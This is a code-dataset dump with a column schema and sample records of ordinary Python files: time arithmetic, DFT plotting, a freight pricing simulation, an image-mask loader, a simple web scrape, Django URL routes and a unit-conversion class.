Dataset schema (one row per column):

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
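Most of the qsc_* columns are per-file quality signals computed from the `content` column. Their exact definitions are not included in this dump, so the sketch below is only a plausible reading of a few of the simpler signals; the function name and every formula are assumptions for illustration, not the dataset's reference implementation.

```python
from collections import Counter

def basic_quality_signals(content: str) -> dict:
    """Plausible reconstructions of a few simple per-file signals.

    The dataset's exact definitions are not given in this dump; each
    formula below is an assumption for illustration only.
    """
    lines = content.splitlines()
    n_chars = len(content)
    line_counts = Counter(lines)
    return {
        "size_file_byte": len(content.encode("utf-8")),
        "num_lines": len(lines),
        "num_chars_line_max": max((len(line) for line in lines), default=0),
        "num_chars_line_mean": n_chars / len(lines) if lines else 0.0,
        "alphanum_fraction": (
            sum(ch.isalnum() for ch in content) / n_chars if n_chars else 0.0
        ),
        "frac_chars_whitespace": (
            sum(ch.isspace() for ch in content) / n_chars if n_chars else 0.0
        ),
        # Assumed reading: fraction of lines whose text occurs more than once.
        "frac_lines_dupe_lines": (
            sum(1 for line in lines if line_counts[line] > 1) / len(lines)
            if lines else 0.0
        ),
    }
```

Signals of this kind accompany each of the sample records that follow.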
---

**Record 1**

- hexsha: 4c3e29e2ae1ab7be40f9cfea714aae230e6e4e54 · size: 2,146 · ext: py · lang: Python
- max_stars: path Back-End/Python/timers/clock_named_tuple.py, repo ASHISHKUMAR2411/Programming-CookBook @ 9c60655d64d21985ccb4196360858d98344701f9, licenses ["MIT"], count 25, events 2021-04-28T02:51:26.000Z to 2022-03-24T13:58:04.000Z
- max_issues: same path, repo, head, and licenses; count 1, events 2022-03-03T23:33:41.000Z to 2022-03-03T23:35:41.000Z
- max_forks: same path, repo, head, and licenses; count 15, events 2021-05-30T01:35:20.000Z to 2022-03-25T12:38:25.000Z
- content:
from collections import namedtuple
MainTimer = namedtuple('MainTimer', 'new_time_joined, end_period, new_weekday, days')
def add_time(start, duration, start_weekday=None):
weekdays = [
'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday',
'Saturday', 'Sunday'
]
start_time, period = start.split(' ')
def process_time():
current_hour, current_minute = ([int(t) for t in start_time.split(':')])
end_hour, end_minute = ([int(d) for d in duration.split(':')])
        # Add the current time and the duration together
end_hours, end_mins = (current_hour + end_hour, current_minute + end_minute)
# Calculates Total days passed
days = int(end_hours/24)
# Calculates New Time
new_time_array = [str(end_hours % 12 + end_mins // 60), ':', str(end_mins % 60).rjust(2, '0')]
new_time_joined = ''.join(new_time_array)
end_period = [period]
        # Number of 12-hour periods elapsed, used below to flip AM/PM
clock = end_hours // 12
if start_weekday:
start_day_idx = weekdays.index(start_weekday.title())
new_weekday = weekdays[(start_day_idx + days % 7) % 7]
else:
new_weekday = False
        # Figure out whether it is AM or PM
for i in range(clock):
if end_period[-1].lower() == 'am':
end_period.append('PM')
else:
end_period.append('AM')
return MainTimer(new_time_joined, end_period, new_weekday, days)
# Triggers process time function
timed = process_time()
def process_output():
new_time = f'New Time is >>> {timed.new_time_joined} {timed.end_period[-1]}'
if timed.new_weekday:
new_time += f'- {timed.new_weekday} -'
if timed.days == 1 and (period != timed.end_period or timed.end_period == 'AM'):
new_time += ' (new_day)'
elif timed.days > 1:
new_time += f' -Total days: {timed.days}- <<'
return new_time
new_time = process_output()
return new_time
print('---'*30)
x = add_time('10:00 AM', '54:00', 'Monday')
print(x)
print('---'*30)
- avg_line_length: 32.029851 · max_line_length: 102 · alphanum_fraction: 0.592265
- qsc_code_*_quality_signal: num_words 278, num_chars 2,146, mean_word_length 4.33813, frac_words_unique 0.316547, frac_chars_top_2grams 0.087065, frac_chars_top_3grams 0.043118, frac_chars_top_4grams 0.036484, frac_chars_dupe_5grams through dupe_9grams 0.074627 each, frac_chars_dupe_10grams 0, frac_chars_replacement_symbols 0, frac_chars_digital 0.019342, frac_chars_whitespace 0.27726, size_file_byte 2,146, num_lines 67, num_chars_line_max 103, num_chars_line_mean 32.029851, frac_chars_alphabet 0.758221, frac_chars_comments 0.085275, cate_xml_start 0, frac_lines_dupe_lines 0.136364, cate_autogen 0, frac_lines_long_string 0, frac_chars_string_length 0.136944, frac_chars_long_word_length 0.022994, frac_lines_string_concat 0, cate_encoded_data 0, frac_chars_hex_words 0, frac_lines_prompt_comments 0, frac_lines_assert 0
- qsc_codepython_*_quality_signal: cate_ast 1, frac_lines_func_ratio 0.068182, cate_var_zero false, frac_lines_pass 0, frac_lines_import 0.022727, frac_lines_simplefunc 0, score_lines_no_logic 0.159091, frac_lines_print 0.068182
- non-signal qsc_code_* / qsc_codepython_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null)
- effective: 1 · hits: 0
---

**Record 2**

- hexsha: 4c4211ba5dbc8c290d97362485169fd20badaf8a · size: 816 · ext: py · lang: Python
- max_stars: path stanford/sms-tools/lectures/02-DFT/plots-code/idft.py, repo phunc20/dsp @ e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886, licenses ["MIT"], count 1, events 2021-03-12T18:32:06.000Z to 2021-03-12T18:32:06.000Z
- max_issues: same path, repo, head, and licenses; count and event datetimes null
- max_forks: same path, repo, head, and licenses; count and event datetimes null
- content:
import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append('../../../software/models/')
import dftModel as DFT
import math
k0 = 8.5
N = 64
w = np.ones(N)
x = np.cos(2*np.pi*k0/N*np.arange(-N/2,N/2))
mX, pX = DFT.dftAnal(x, w, N)
y = DFT.dftSynth(mX, pX, N)
plt.figure(1, figsize=(9.5, 5))
plt.subplot(311)
plt.title('positive freq. magnitude spectrum in dB: mX')
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,mX.size, min(mX), max(mX)+1])
plt.subplot(312)
plt.title('positive freq. phase spectrum: pX')
plt.plot(np.arange(pX.size), pX, 'c', lw=1.5)
plt.axis([0, pX.size,-np.pi,np.pi])
plt.subplot(313)
plt.title('inverse spectrum: IDFT(X)')
plt.plot(np.arange(-N/2, N/2), y,'b', lw=1.5)
plt.axis([-N/2,N/2-1,min(y), max(y)])
plt.tight_layout()
plt.savefig('idft.png')
plt.show()
- avg_line_length: 23.314286 · max_line_length: 56 · alphanum_fraction: 0.654412
- qsc_code_*_quality_signal: num_words 170, num_chars 816, mean_word_length 3.135294, frac_words_unique 0.382353, frac_chars_top_2grams 0.022514, frac_chars_top_3grams 0.016886, frac_chars_top_4grams 0.022514, frac_chars_dupe_5grams 0.110694, frac_chars_dupe_6grams 0.090056, frac_chars_dupe_7grams through dupe_10grams 0, frac_chars_replacement_symbols 0, frac_chars_digital 0.049519, frac_chars_whitespace 0.109069, size_file_byte 816, num_lines 34, num_chars_line_max 57, num_chars_line_mean 24, frac_chars_alphabet 0.683631, frac_chars_comments 0, cate_xml_start 0, frac_lines_dupe_lines 0, cate_autogen 0, frac_lines_long_string 0, frac_chars_string_length 0.167892, frac_chars_long_word_length 0.030637, frac_lines_string_concat 0, cate_encoded_data 0, frac_chars_hex_words 0, frac_lines_prompt_comments 0, frac_lines_assert 0
- qsc_codepython_*_quality_signal: cate_ast 1, frac_lines_func_ratio 0, cate_var_zero false, frac_lines_pass 0, frac_lines_import 0.178571, frac_lines_simplefunc 0, score_lines_no_logic 0.178571, frac_lines_print 0
- non-signal qsc_code_* / qsc_codepython_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null)
- effective: 1 · hits: 0
---

**Record 3**

- hexsha: 4c449a22ce009dfff20f9f81e80e2e5aae88a200 · size: 3,200 · ext: py · lang: Python
- max_stars: path 2021-02-03/2.py, repo Elfenreigen/MCM-2021-C-SJTU-Test @ 98e3b14dbe7bb0ab4a76245d14e4691050704ac9, licenses ["MIT"], count 1, events 2022-01-24T11:59:40.000Z to 2022-01-24T11:59:40.000Z
- max_issues: same path, repo, head, and licenses; count and event datetimes null
- max_forks: same path, repo, head, and licenses; count and event datetimes null
- content:
#####Time Flow Simulation######
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from datetime import timedelta
import datetime
import csv
data=pd.read_excel('CF66-all.xlsx')
data.sort_values(by=['WBL_AUD_DT'],ascending=True,inplace=True)
or_data=pd.read_excel('CF66-ordinary.xlsx')
rule=pd.read_excel('6. Existing pricing strategy.xlsx')
or_name=or_data['WBL_NUM'].unique()
data['ordinary']=0
for i in range(len(data)):
if data.iloc[i,2] in or_name:
data.iloc[i,9]=1
data['volume']=data['CNTR_TYPE']
for i in range(len(data)):
data.iloc[i,10]=int(data.iloc[i,10][0:2])
raw_data=data.groupby('SVVD')
data_to_list=list(raw_data)
raw_list=[]
for i in data_to_list:
raw_list.append(i[1])
total_volume=raw_data['volume'].sum()*1.2
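# Translation of the Chinese data keys used below: '装港'/'卸港' = loading/discharge port
# (this selects the Yingkou '营口' to Haikou '海口' lane); '开始天数'/'结束天数' = start/end day;
# '舱位利用率阈值' = capacity-utilization threshold; '涨价'/'降价' = price increase/decrease.
# The keys themselves must stay as-is to match the Excel column names.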
thisrule=rule.groupby(['装港','卸港']).get_group(('营口','海口'))
group_rule=thisrule.groupby(['开始天数','结束天数'])
rule_to_list=list(group_rule)
day_list=[]
rule_list=[]
for i in rule_to_list:
day_list.append(i[0])
rule_list.append(i[1])
m=datetime.timedelta(days=14)
newlist=[]
for i in raw_list:
i['WBL_AUD_DT']=pd.to_datetime(i['WBL_AUD_DT'])
m=datetime.timedelta(days=14)
j=i[i['WBL_AUD_DT']>=i['WBL_AUD_DT'].max()-m]
newlist.append(j)
del raw_list
for i in newlist:
i['acc_volume']=i['volume'].cumsum()
i['total_volume']=i['volume'].sum()*1.2
m=datetime.timedelta(days=14)
i['day']=(i['WBL_AUD_DT']-i['WBL_AUD_DT'].max()+m).dt.days
i['acc_rate']=i['acc_volume']/i['total_volume']*100
i['new_AMT']=i['AMT']
for k in range(len(newlist)):
acc_20gp=0
acc_40gp=0
acc_40hq=0
print('k='+str(k))
for i in range(len(day_list)):
print('i='+str(i))
first_day=day_list[i][0]
last_day=day_list[i][1]
flag=[0]*len(rule_list[i])
for j in range(len(newlist[k])):
if newlist[k].iloc[j]['day']>=first_day and newlist[k].iloc[j]['day']<last_day and newlist[k].iloc[j]['ordinary']==1:
for z in range(len(rule_list[i])):
print('z='+str(z))
if newlist[k].iloc[j]['acc_rate']>rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='涨价':
if flag[z]==0:
flag[z]=1
acc_20gp+=rule_list[i].iloc[z]['20GP']
acc_40gp+=rule_list[i].iloc[z]['40GP']
acc_40hq+=rule_list[i].iloc[z]['40HQ']
if newlist[k].iloc[j]['acc_rate']<rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='降价':
if flag[z]==0:
flag[z]=1
acc_20gp-=rule_list[i].iloc[z]['20GP']
acc_40gp-=rule_list[i].iloc[z]['40GP']
acc_40hq-=rule_list[i].iloc[z]['40HQ']
print(flag)
print(acc_20gp)
print(acc_40gp)
print(acc_40hq)
if newlist[k].iloc[j]['CNTR_TYPE']=='20GP':
newlist[k].iloc[j,15]+=acc_20gp
if newlist[k].iloc[j]['CNTR_TYPE']=='40GP':
newlist[k].iloc[j,15]+=acc_40gp
if newlist[k].iloc[j]['CNTR_TYPE']=='40HQ':
newlist[k].iloc[j,15]+=acc_40hq
for i in newlist:
print('revenue:'+str(i['AMT'].sum()))
print('newrevenue:'+str(i['new_AMT'].sum()))
newlist[0].to_csv('voyage1.csv')
newlist[1].to_csv('voyage2.csv')
newlist[2].to_csv('voyage3.csv')
- avg_line_length: 27.118644 · max_line_length: 121 · alphanum_fraction: 0.62375
- qsc_code_*_quality_signal: num_words 567, num_chars 3,200, mean_word_length 3.349206, frac_words_unique 0.190476, frac_chars_top_2grams 0.039494, frac_chars_top_3grams 0.056872, frac_chars_top_4grams 0.075303, frac_chars_dupe_5grams 0.3802, frac_chars_dupe_6grams 0.290153, frac_chars_dupe_7grams 0.220642, frac_chars_dupe_8grams 0.184308, frac_chars_dupe_9grams 0.184308, frac_chars_dupe_10grams 0.184308, frac_chars_replacement_symbols 0, frac_chars_digital 0.037961, frac_chars_whitespace 0.160313, size_file_byte 3,200, num_lines 117, num_chars_line_max 122, num_chars_line_mean 27.350427, frac_chars_alphabet 0.668776, frac_chars_comments 0.00625, cate_xml_start 0, frac_lines_dupe_lines 0.123596, cate_autogen 0, frac_lines_long_string 0, frac_chars_string_length 0.14941, frac_chars_long_word_length 0, frac_lines_string_concat 0, cate_encoded_data 0, frac_chars_hex_words 0, frac_lines_prompt_comments 0, frac_lines_assert 0
- qsc_codepython_*_quality_signal: cate_ast 1, frac_lines_func_ratio 0, cate_var_zero false, frac_lines_pass 0, frac_lines_import 0.067416, frac_lines_simplefunc 0, score_lines_no_logic 0.067416, frac_lines_print 0.101124
- non-signal qsc_code_* / qsc_codepython_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null)
- effective: 1 · hits: 0
---

**Record 4**

- hexsha: 4c497bbd6391fbc0eaad2b9548fcee8c07a53d5e · size: 2,348 · ext: py · lang: Python
- max_stars / max_issues / max_forks: path samples/cmk/test.py, repo jasstionzyf/Mask_RCNN @ 971a9dd9be1f9716e6f7c23b959bd57079cd93eb, licenses ["MIT"]; all counts and event datetimes null
- content:
import os
import sys
import json
import datetime
import numpy as np
import glob
import skimage
from PIL import Image as pil_image
import cv2
def locationToMask(locations=None,height=None,width=None):
mask = np.zeros([height, width, len(locations)],
dtype=np.uint8)
for index,location in enumerate(locations):
x1, y1, x2, y2 = location
mask[y1:y2+1,x1:x2+1,index]=1
print(mask[:,:,index])
    return mask.astype(bool), np.ones([mask.shape[-1]], dtype=np.int32)
def load_cmk(dataset_dir, subset):
folder=os.path.join(dataset_dir, subset)
imagesPattern=folder+'/*.jpg'
for image_path in glob.glob(imagesPattern):
print(image_path)
img = cv2.imread(image_path)
height,width = img.shape[:2]
imageId=os.path.basename(image_path).replace('.jpg','')
print(imageId)
#
# self.add_image(
# "balloon",
# image_id=a['filename'], # use file name as a unique image id
# path=image_path,
# width=width, height=height,
# polygons=polygons)
locationsFile='%s/%s.txt' % (folder,imageId)
locations=[]
with open(locationsFile) as fp:
lines = fp.readlines()
for line in lines:
line = line.replace('\n', '')
if len(line.split(' ')) < 5:
break
classIndex, xcen, ycen, w, h = line.strip().split(' ')
xmin = max(float(xcen) - float(w) / 2, 0)
xmax = min(float(xcen) + float(w) / 2, 1)
ymin = max(float(ycen) - float(h) / 2, 0)
ymax = min(float(ycen) + float(h) / 2, 1)
xmin = int(width * xmin)
xmax = int(width * xmax)
ymin = int(height * ymin)
ymax = int(height * ymax)
location=(xmin,ymin,xmax,ymax)
locations.append(location)
print(locations)
dataset_dir='/Volumes/v2/data/mlib_data/dataset/cmk/images_v2/'
subset='val'
load_cmk(dataset_dir=dataset_dir,subset=subset)
locations=[(2,3,5,7),(8,8,9,9)]
height=10
width=10
# mask,classIds=locationToMask(locations=locations,height=height,width=width)
# print(mask)
# print(classIds)
- avg_line_length: 18.488189 · max_line_length: 77 · alphanum_fraction: 0.559199
- qsc_code_*_quality_signal: num_words 294, num_chars 2,348, mean_word_length 4.408163, frac_words_unique 0.377551, frac_chars_top_2grams 0.03858, frac_chars_top_3grams 0.037037, frac_chars_top_4grams 0.026235, frac_chars_dupe_5grams 0.049383, frac_chars_dupe_6grams through dupe_10grams 0, frac_chars_replacement_symbols 0, frac_chars_digital 0.025862, frac_chars_whitespace 0.308348, size_file_byte 2,348, num_lines 126, num_chars_line_max 78, num_chars_line_mean 18.634921, frac_chars_alphabet 0.772167, frac_chars_comments 0.117121, cate_xml_start 0, frac_lines_dupe_lines 0.037736, cate_autogen 0, frac_lines_long_string 0, frac_chars_string_length 0.036479, frac_chars_long_word_length 0.023833, frac_lines_string_concat 0, cate_encoded_data 0, frac_chars_hex_words 0, frac_lines_prompt_comments 0, frac_lines_assert 0
- qsc_codepython_*_quality_signal: cate_ast 1, frac_lines_func_ratio 0.037736, cate_var_zero false, frac_lines_pass 0, frac_lines_import 0.188679, frac_lines_simplefunc 0, score_lines_no_logic 0.245283, frac_lines_print 0.075472
- non-signal qsc_code_* / qsc_codepython_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null)
- effective: 1 · hits: 0
---

**Record 5**

- hexsha: 4c49c1d6c63daaf7fca0ba56abe4608634b5eea3 · size: 371 · ext: py · lang: Python
- max_stars / max_issues / max_forks: path myBeautifulSoup.py, repo ZhongXinWang/python @ 4cf3ecdc9d9e811e777c6d8408a8319097cfdec3, licenses ["Apache-2.0"]; all counts and event datetimes null
- content:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Author:Winston.Wang
import requests
from bs4 import BeautifulSoup
print(dir(BeautifulSoup))
url = 'http://www.baidu.com'
with requests.get(url) as r:
r.encoding='utf-8'
    soup = BeautifulSoup(r.text, 'html.parser')
    # Prettify the markup
    pret = soup.prettify()
u = soup.select('#u1 a')
for i in u:
print("名称:%s,地址:%s" % (i.getText(),i.get('href')))
- avg_line_length: 24.733333 · max_line_length: 52 · alphanum_fraction: 0.660377
- qsc_code_*_quality_signal: num_words 61, num_chars 371, mean_word_length 4.016393, frac_words_unique 0.721311, frac_chars_top_2grams 0.032653, frac_chars_top_3grams 0, frac_chars_top_4grams 0, frac_chars_dupe_5grams through dupe_10grams 0, frac_chars_replacement_symbols 0, frac_chars_digital 0.01548, frac_chars_whitespace 0.12938, size_file_byte 371, num_lines 15, num_chars_line_max 52, num_chars_line_mean 24.733333, frac_chars_alphabet 0.743034, frac_chars_comments 0.175202, cate_xml_start 0, frac_lines_dupe_lines 0, cate_autogen 0, frac_lines_long_string 0, frac_chars_string_length 0.148515, frac_chars_long_word_length 0, frac_lines_string_concat 0, cate_encoded_data 0, frac_chars_hex_words 0, frac_lines_prompt_comments 0, frac_lines_assert 0
- qsc_codepython_*_quality_signal: cate_ast 1, frac_lines_func_ratio 0, cate_var_zero false, frac_lines_pass 0, frac_lines_import 0.181818, frac_lines_simplefunc 0, score_lines_no_logic 0.181818, frac_lines_print 0.181818
- non-signal qsc_code_* / qsc_codepython_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null)
- effective: 1 · hits: 0
---

**Record 6**

- hexsha: 4c4aaf6acc32d2b6cfe7656b0adf41a02eba514c · size: 869 · ext: py · lang: Python
- max_stars: path blogsNewsModule/urls.py, repo adityakekare/NewsAPIDjango @ 47ff0c69e3d48c10a257c8221916ccd2fdaf9abb, licenses ["MIT"], count 1, events 2020-10-14T17:13:45.000Z to 2020-10-14T17:13:45.000Z
- max_issues: same path, repo, head, and licenses; count and event datetimes null
- max_forks: same path, repo, head, and licenses; count and event datetimes null
- content:
from django.urls import path, include
from . import views
urlpatterns = [
path("", views.newsView, name="home"),
path("createBlog", views.CreateBlogView.as_view(), name="createBlog"),
path("myBlogs", views.PostListView.as_view(), name="myBlogs"),
path("single/<int:pk>", views.PostDetailView.as_view(), name="single"),
path("subscribe", views.subscribeView,name="subscribe"),
path("about", views.aboutView, name="about"),
path("edit/<int:pk>", views.UpdateBlogView.as_view(), name="edit"),
path("delete/<int:pk>", views.DeleteBlogView.as_view(), name="delete"),
path("like/<int:pk>", views.LikeView, name="like_post"),
# API urls for superuser
path("api/create/", views.APICreateView.as_view()),
path("api/posts/", views.APIListView.as_view()),
path("api/posts/<int:pk>", views.APIDetailView.as_view()),
]
- avg_line_length: 41.380952 · max_line_length: 75 · alphanum_fraction: 0.667434
- qsc_code_*_quality_signal: num_words 109, num_chars 869, mean_word_length 5.238532, frac_words_unique 0.366972, frac_chars_top_2grams 0.084063, frac_chars_top_3grams 0.087566, frac_chars_top_4grams 0.045534, frac_chars_dupe_5grams 0.063047, frac_chars_dupe_6grams through dupe_10grams 0, frac_chars_replacement_symbols 0, frac_chars_digital 0, frac_chars_whitespace 0.130035, size_file_byte 869, num_lines 21, num_chars_line_max 76, num_chars_line_mean 41.380952, frac_chars_alphabet 0.755291, frac_chars_comments 0.025316, cate_xml_start 0, frac_lines_dupe_lines 0, cate_autogen 0, frac_lines_long_string 0, frac_chars_string_length 0.219858, frac_chars_long_word_length 0, frac_lines_string_concat 0, cate_encoded_data 0, frac_chars_hex_words 0, frac_lines_prompt_comments 0, frac_lines_assert 0
- qsc_codepython_*_quality_signal: cate_ast 1, frac_lines_func_ratio 0, cate_var_zero false, frac_lines_pass 0, frac_lines_import 0.125, frac_lines_simplefunc 0, score_lines_no_logic 0.125, frac_lines_print 0
- non-signal qsc_code_* / qsc_codepython_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null)
- effective: 1 · hits: 0
---

**Record 7**

- hexsha: 4c4ab4331dee2d296afdfa6d9310db62fe1c4c93 · size: 3,133 · ext: py · lang: Python
- max_stars / max_issues / max_forks: path unitClass.py, repo MatthewZheng/UnitsPlease @ 5911267b5a0a78dd4d833c6be46e89caaf98c200, licenses ["MIT"]; all counts and event datetimes null
- content:
#!/usr/bin/python
_author_ = "Matthew Zheng"
_purpose_ = "Sets up the unit class"
class Unit:
'''This is a class of lists'''
def __init__(self):
self.baseUnits = ["m", "kg", "A", "s", "K", "mol", "cd", "sr", "rad"]
self.derivedUnits = ["Hz", "N", "Pa", "J", "W", "C", "V", "F", "ohm", "S", "Wb", "T", "H", "°C", "lm", "lx", "Bq", "Gy", "Sv", "kat"]
def baseCheck(self, userList):
'''Converts elements in str list to base units'''
converted = []
for i in (userList):
isSquared = False
unitPreIndex = ""
#checks if it has a carat in the expression
for ind, j in enumerate(list(i)):
if j == "^":
isSquared = True
unitPreIndex = ''.join(list(i)[:ind])
break
#converts non-unary unit to base unit and checks for squared variables
            while i not in self.baseUnits + self.derivedUnits and len(list(i)) != 1 and unitPreIndex not in self.baseUnits + self.derivedUnits and len(unitPreIndex) != 1:
orgNameList = list(i)
#identify prefix removed
self.idPrefix = orgNameList.pop(0)
i = ''.join(orgNameList)
print("The program removed the prefix %s and converted your unit to it's base unit: %s." % (self.idPrefix, i))
#checks if it is a special unit
                if i not in self.baseUnits and i not in self.derivedUnits:
#append in case for special units
break
else:
#append in case for base unit
break
#Appends base unit
            if i in self.baseUnits + self.derivedUnits and not isSquared:
converted.append(i)
            elif isSquared:
toAppend = []
numReps = []
#run once to get number of times the unit is squared
for index, val in enumerate(list(i)):
if val == "^":
numStart = index+1
numReps.append(''.join(list(i)[numStart:]))
toAppend.append(''.join(list(i)[:index]))
break
#convert numReps into an int
intReps = int(''.join(numReps))
#append number of units specified by the carat
for l in range (intReps):
                    if ''.join(toAppend) not in self.baseUnits + self.derivedUnits:
print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % ''.join(toAppend))
converted.append(''.join(toAppend))
#Exception for special units
else:
print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % i)
converted.append(i)
return(converted)
- avg_line_length: 42.917808 · max_line_length: 192 · alphanum_fraction: 0.509416
- qsc_code_*_quality_signal: num_words 372, num_chars 3,133, mean_word_length 4.271505, frac_words_unique 0.365591, frac_chars_top_2grams 0.022026, frac_chars_top_3grams 0.0472, frac_chars_top_4grams 0.045312, frac_chars_dupe_5grams 0.273128, frac_chars_dupe_6grams 0.237885, frac_chars_dupe_7grams 0.237885, frac_chars_dupe_8grams 0.192574, frac_chars_dupe_9grams 0.192574, frac_chars_dupe_10grams 0.139711, frac_chars_replacement_symbols 0, frac_chars_digital 0.002052, frac_chars_whitespace 0.377913, size_file_byte 3,133, num_lines 72, num_chars_line_max 193, num_chars_line_mean 43.513889, frac_chars_alphabet 0.812724, frac_chars_comments 0.151931, cate_xml_start 0, frac_lines_dupe_lines 0.177778, cate_autogen 0, frac_lines_long_string 0.066667, frac_chars_string_length 0.168501, frac_chars_long_word_length 0, frac_lines_string_concat 0, cate_encoded_data 0, frac_chars_hex_words 0, frac_lines_prompt_comments 0, frac_lines_assert 0
- qsc_codepython_*_quality_signal: cate_ast 1, frac_lines_func_ratio 0.044444, cate_var_zero false, frac_lines_pass 0, frac_lines_import 0, frac_lines_simplefunc 0, score_lines_no_logic 0.066667, frac_lines_print 0.066667
- non-signal qsc_code_* / qsc_codepython_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat (null)
- effective: 1 · hits: 0
---

**Record 8**

- hexsha: 4c4da9a43e106d41a3befb2cd7c5b3dab87492dd · size: 274 · ext: py · lang: Python
- max_stars: path conans/server/server_launcher.py, repo Wonders11/conan @ 28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8, licenses ["MIT"], count 6,205, events 2015-12-01T13:40:05.000Z to 2022-03-31T07:30:25.000Z
